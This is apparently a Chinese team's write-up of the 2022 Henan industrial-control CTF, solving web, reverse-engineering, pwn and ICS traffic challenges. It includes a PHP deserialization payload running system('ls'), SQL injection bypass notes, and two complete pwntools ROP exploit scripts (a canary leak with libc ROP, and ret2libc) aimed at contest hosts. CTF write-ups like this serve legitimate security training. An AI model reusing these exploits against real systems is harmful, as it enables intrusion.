0%

2022河南工控CTF

image-20221104183502219

前言

初赛成绩学生组第七,复赛成绩学生组第四(因为疫情复赛没有线下举办,挺可惜的,同时在比赛当天学校因疫情紧急封校,条件刻苦,大家一块努力打了一天,这个成绩是我们大家一块努力赢得的,尽管没有进总决赛,但是大家尽力了,下次继续加油!!!),放个复赛的成绩截图吧(这个截图是全排名)

image-20221104183502219

初赛

HNGK-工程文件分析

下载一个压缩包,解压之后执行strings $(find . | xargs) | grep flag{

得到flag

img

flag{3u1xaCYSVSK5cJDT}

HNGK-xxx

考察xxe

File协议直接读flag

img

flag{1gggkinjp31rtp028abi4k6356jbfm7d}

HNGK-兰亭集序

目录穿越遍历可以任意文件读取

img

得到提示,直接读fflagggg.php

img

flag{1gggktmmtnbdta028abi4k638fjbfmam}

HNGK-S7Comm协议分析

协议分析,过滤一下COTP,追踪TCP流,找到一串编码,追踪tcp流

img

hex字符互转得到flag

flag{ktBuC4Lzj3}

HNGK-phpgame

乱码恢复之后得到php66.php

访问php66.php得到源码

img
传参?get={“year”:“x”,“items”:[222,[],0]}满足条件得到flag

img

flag{1ggh0092pgbqs3028abi4k63nejbfmpl}

HNGK-out

Sql注入

img

找到注入点

img

Fuzz发现过滤了空格,并且需要双写绕过and

img

img

得到flag

flag{1ggguedosum8i60288b4a0l721dssb0a}

HNGK-DS_Store

img

Base64解码得到mypop.php

反序列化构造利用,///绕过+wakeup绕过命令执行

如下

<?php

 

class Fish{

  public $food;

  public function __construct($flag1){

​    $this->food = $flag1;

  }

 

}

 

class Bubble{

  public $bubble;

  public $hack;

  public function __construct(){

​    

​    $this->hack = 'system("ls");';

​    

  }

 

}

 

class Turtle{

  public $head;

  public $tail;

  public function __construct($flag2){

​    $this->tail = $flag2;

  }

  

}

 

class Stone{

  public $rock;

  public $ash;

  public function __construct($flag){

​    $this->rock = $flag;

  }

 

}

 

$huang = new Bubble();

$ll = new Fish($huang);

$f = new Turtle($ll);

$flag = new Stone($f);

 

echo serialize($flag);

 

?>

img

img

flag{1gghl70plj1mi1028abi4k63rgjbfmtn}

HNGK-easy_wincc

一堆文件夹,直接使用破空flag关键字搜索得到flag

img

flag{wincc_1s_1nteresting~}

HNGK-签到

ida64位打开分析

img

跟进cewwe23rf

img

得出:a2[this[i]-48]=a3[i]

分析v5,v7,v8

得出v7

‘’‘

a='OFG{OxS3Lha6MUDk[0PnXofmcUrp`E3w`1@zalL2fZX1gJn4SWHFPGTEP2jHQivOVW7RWDDQW3PTTnf[UTmjSAOiHT6oIkerZ{q?'
 b=[0 for i in range(len(a))]
 for i in range(len(a)):
   b[i]=ord(a[i])^2
   print(chr(b[i]),end='')

‘‘’

V8

‘’‘

a='bEBn`GBkMV{fJyMLTF{yR@sQVjUNIoULJVtsN@UQ[d>>'
b=[0 for i in range(len(a))]
for i in range(len(a)):
    b[i]=ord(a[i])^3
    print(chr(b[i]),end='')

‘‘’

结果再base64解码

脚本如下:

‘’‘

a='hP&p0!5L^#3NXLs@*QR%L&UN!L)0%Q^'
b='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_+'
for i in range(len(a)):
    c=b.find(a[i])
    print(chr(c+48),end='')

‘‘’

flag{ActI0n5_sp3ak_Louder_than_w0rds}

HNGK-反调试

Ida32位打开

img

Tls反调试

调试得到dowrd_41A040=[0x176,0x39e,0x293,0x3fd,0x11d,0x91,0x229,0x50,0x1f9,0x171,0x12b,0x2ec,0x300,0x8d,0x3fd,0x171,0xd1,0x8d,0xd6,0x50,0x171,0x104,0x219,0x21
]

脚本如下:

‘’’

a=[0x176,0x39e,0x293,0x3fd,0x11d,0x91,0x229,0x50,0x1f9,0x171,0x12b,0x2ec,0x300,0x8d,0x3fd,0x171,0xd1,0x8d,0xd6,0x50,0x171,0x104,0x219,0x21]
print(len(a))
for i in range(0,23):
    for j in range(0,127):
        if (a[i] * j % 1031 == 1):
            print(chr(j), end='')

‘’’

flag{@nt1_d3bug_Ju5t_s0}

HNGK-py字节码

附件给的是个字节码

分析能得到以下代码

img

分析并计算得到seed=22

‘‘’

a = 17
b = 13
def rand():
    global seed
    seed = (a*seed+b) % 128
    return seed
seed = 22
enc = [102, 3, 46, 0, 78, 102, 103, 57, 116, 63, 110, 127, 121, 59, 57, 33, 49, 11, 110, 18, 6]
data = [102, 50, 35, 35, 35, 17, 67, 35, 69, 35, 51, 34, 35, 69, 35, 69, 35, 51, 34, 35, 153]
flag = [0]*20
for i in range(20):
    data[i+1] = data[i] ^ i ^(rand() % 128)
    flag[i] = enc[i+1] ^ data[i+1]
    data[i+1] = enc[i+1]
print(bytes(flag))

‘’‘

flag{Pyth0n_1s_yyds}

HNGK-数独

32位ida打开分析

img

发现迷宫

img

img

这里运行会转到SHE

脚本如下:

‘‘’

w = "{hXxAjYkacX+8>h#<Z9g<dqAQNxZp4Ccq3QLjorvP+Ox3oPOBiHD5r;gHuRa@yIfmO2=K9brZMeO6Qz2K"
m = "5619238183457621978469254539786692871328563671281793452"
c = 0
for i in range(len(m)):
    a = ord(m[i])-48
    b = w[c*9+a-1]
    c = (c+1)%9
    print(b,end='')

‘’‘

Ah9LoOyf2X8q3+P;rzk8ALoiu=ea#Nq+rgbz{+gQPHHKz{XNZOrH26h

HNGK-easystack

分析附件存在格式化字符串漏洞和栈溢出

img

Canary保护

分析附件

脚本如下:

‘’‘

from pwn import *

context(log_level='debug',os='linux',arch='amd64')

\#r = process('./sta')

r = remote('47.92.27.98', '26421')

elf = ELF('./sta')

libc = elf.libc

libc = ELF('./libc-2.31.so')

 

puts_plt = elf.plt['puts']

puts_got = elf.got['puts']

main = 0x401511

bss_seg = 0x404080

pop_rdi_ret = 0x401653

def m(cc,payload=''):

  r.sendlineafter(">> ",str(cc))

  if cc == 1:

​    r.send(payload)

 

def ln():

  payload = b'%4660c%7$n'

  r.sendlineafter("Please input: ",payload)

ln()

payload1 = b'a'*0x68+b'b'

m(1,payload1)

m(2)

r.recvuntil(b'b')

canary = u64(r.recv(7).rjust(8,b'\x00'))

payload = b'c'*0x68+p64(canary)+p64(0)+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(main)

m(1,payload)

m(3)

puts_addr = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))

libc_base = puts_addr-libc.sym['puts']

o = libc_base+libc.sym['open']

rr = libc_base+libc.sym['read']

w = libc_base+libc.sym['write']

pop_rdi_ret = libc_base+0x23b6a

pop_rsi_ret = libc_base+0x2601f

pop_rdx_ret = libc_base+0x142c92

orw1 = b'c'*0x68+p64(canary)+p64(0)

orw1 += p64(pop_rdi_ret)+p64(0)+p64(pop_rsi_ret)+p64(bss_seg+0x100)+p64(pop_rdx_ret)+p64(0x100)+p64(rr)+p64(main)

ln()

m(1,orw1)

m(3)

r.send("./flag")

 

print("open!")

orw2 = b'c'*0x68+p64(canary)+p64(0)

orw2 += p64(pop_rdi_ret)+p64(bss_seg+0x100)+p64(pop_rsi_ret)+p64(0)+p64(o)+p64(main)

ln()

m(1,orw2)

\#gdb.attach(r)

\#pause()

m(3)

 

print("read!")

orw3 = b'c'*0x68+p64(canary)+p64(0)

orw3 += p64(pop_rdi_ret)+p64(3)+p64(pop_rsi_ret)+p64(bss_seg+0x200)+p64(pop_rdx_ret)+p64(0x100)+p64(rr)+p64(main)

ln()

m(1,orw3)

m(3)

print("write!")

orw4 = b'c'*0x68+p64(canary)+p64(0)

orw4 += p64(pop_rdi_ret)+p64(1)+p64(pop_rsi_ret)+p64(bss_seg+0x200)+p64(pop_rdx_ret)+p64(0x100)+p64(w)+p64(main)

ln()

m(1,orw4)

\#gdb.attach(r)

\#pause()

m(3)

success(hex(canary))

success(hex(libc_base))

r.interactive()

‘‘’

img

HNGK-easybaby

栈溢出漏洞retlibc

保护

img

‘’‘

from pwn import *
context(log_level='debug',os='linux',arch='amd64')
#r = process('./babygame')
r = remote('47.92.207.120','24037')
elf = ELF('./babygame')
libc = ELF('./libc-2.31.so')

bss_seg = 0x405100
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
read_got = elf.got['read']
ret = 0x401505
pop_rdi_ret = 0x402c33
pop_rsi_r15_ret = 0x402c31
gadget_overflow = 0x4014BB
def one():
    r.sendlineafter("请输入你的选择:\n",str(3))
    r.sendlineafter("2、逃跑\n",str(1))

def two():
    r.sendlineafter("请输入你的选择:\n",str(4))
    for i in range(23):
        r.sendlineafter("2、逃跑\n",str(1))
def up():
    r.sendlineafter("请输入你的选择:\n",str(1))
    r.sendlineafter("7、离开武器店\n",str(4))
    r.sendline(str(7))

for i in range(40):
    one()
up()
for i in range(40):
    one()
up()
for i in range(40):
    one()
up()
two()

payload = b'a'*0x30+p64(bss_seg+0x800)+p64(pop_rdi_ret)+p64(read_got)+p64(puts_plt)+p64(0x000000000401190)
r.sendlineafter("好汉,留下你的姓名\n",payload)
puts_addr = u64(r.recv(6).ljust(8,b'\x00'))
libc_base = puts_addr-libc.sym['read']
system = libc_base+libc.sym['system']
sh = libc_base+0x1B45BD
success(hex(puts_addr))
success(hex(libc_base))

r.sendline(str(6))
gadget1 = 0x0000000000402C2A
gadget2 = 0x0000000000402C10
payload2  = b'b'*0x28+p64(system)+p64(bss_seg+0x800)
payload2 += p64(pop_rdi_ret)+p64(sh)+p64(ret)+p64(system)
r.sendlineafter("好汉,留下你的姓名\n",payload2)
r.interactive()

‘‘‘

img

复赛

HNGK-流量分析

直接使用grep全局搜.png发现base64加密的内容

img

提取出来用脚本转一下图片

import os

import base64

str = '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"'

data = base64.b64decode(str)

with open('flag.png', 'wb') as f:

  f.write(data)

img

flag{ICS-mms104}

HNGK-Modbus流量分析

这个找到了原题

2019工业信息安全技能大赛个人线上赛第一场(前5道)writeup - 先知社区 (aliyun.com)

用原题的脚本就可以解出来

先是分析Modbus/TCP的功能码

import pyshark

def get_code():

   captures = pyshark.FileCapture("Modbus.pcap")

   func_codes = {}

   for c in captures:

​     for pkt in c:

​       if pkt.layer_name == "modbus":

​         func_code = int(pkt.func_code)

​         if func_code in func_codes:

​           func_codes[func_code] += 1

​         else:

​           func_codes[func_code] = 1

   print(func_codes)

if __name__ == '__main__':

 get_code()

img

然后这些功能码对应的作用是1(读取线圈状态),3(读多个寄存器),4(读输入寄存器),2(读取输入内容),唯独16(预置多个寄存器)功能码只出现了两次,所以考虑16功能码有flag数据,使用脚本分析16功能码

import pyshark
def find_flag():
     cap = pyshark.FileCapture("Modbus.pcap")
     idx = 1
     for c in cap:
         for pkt in c:
             if pkt.layer_name == "modbus":
                 func_code = int(pkt.func_code)
                 if func_code == 16:
                     payload = str(c["TCP"].payload).replace(":", "")
                     print(hex_to_ascii(payload))
                     print("{0} *".format(idx))
         idx += 1
def hex_to_ascii(payload):
 data = payload
 flags = []
 for d in data:
     _ord = ord(d)
     if (_ord > 0) and (_ord < 128):
         flags.append(chr(_ord))
 return ''.join(flags)
if __name__ == '__main__':
 find_flag()

img

得到数据hex转str得到flag

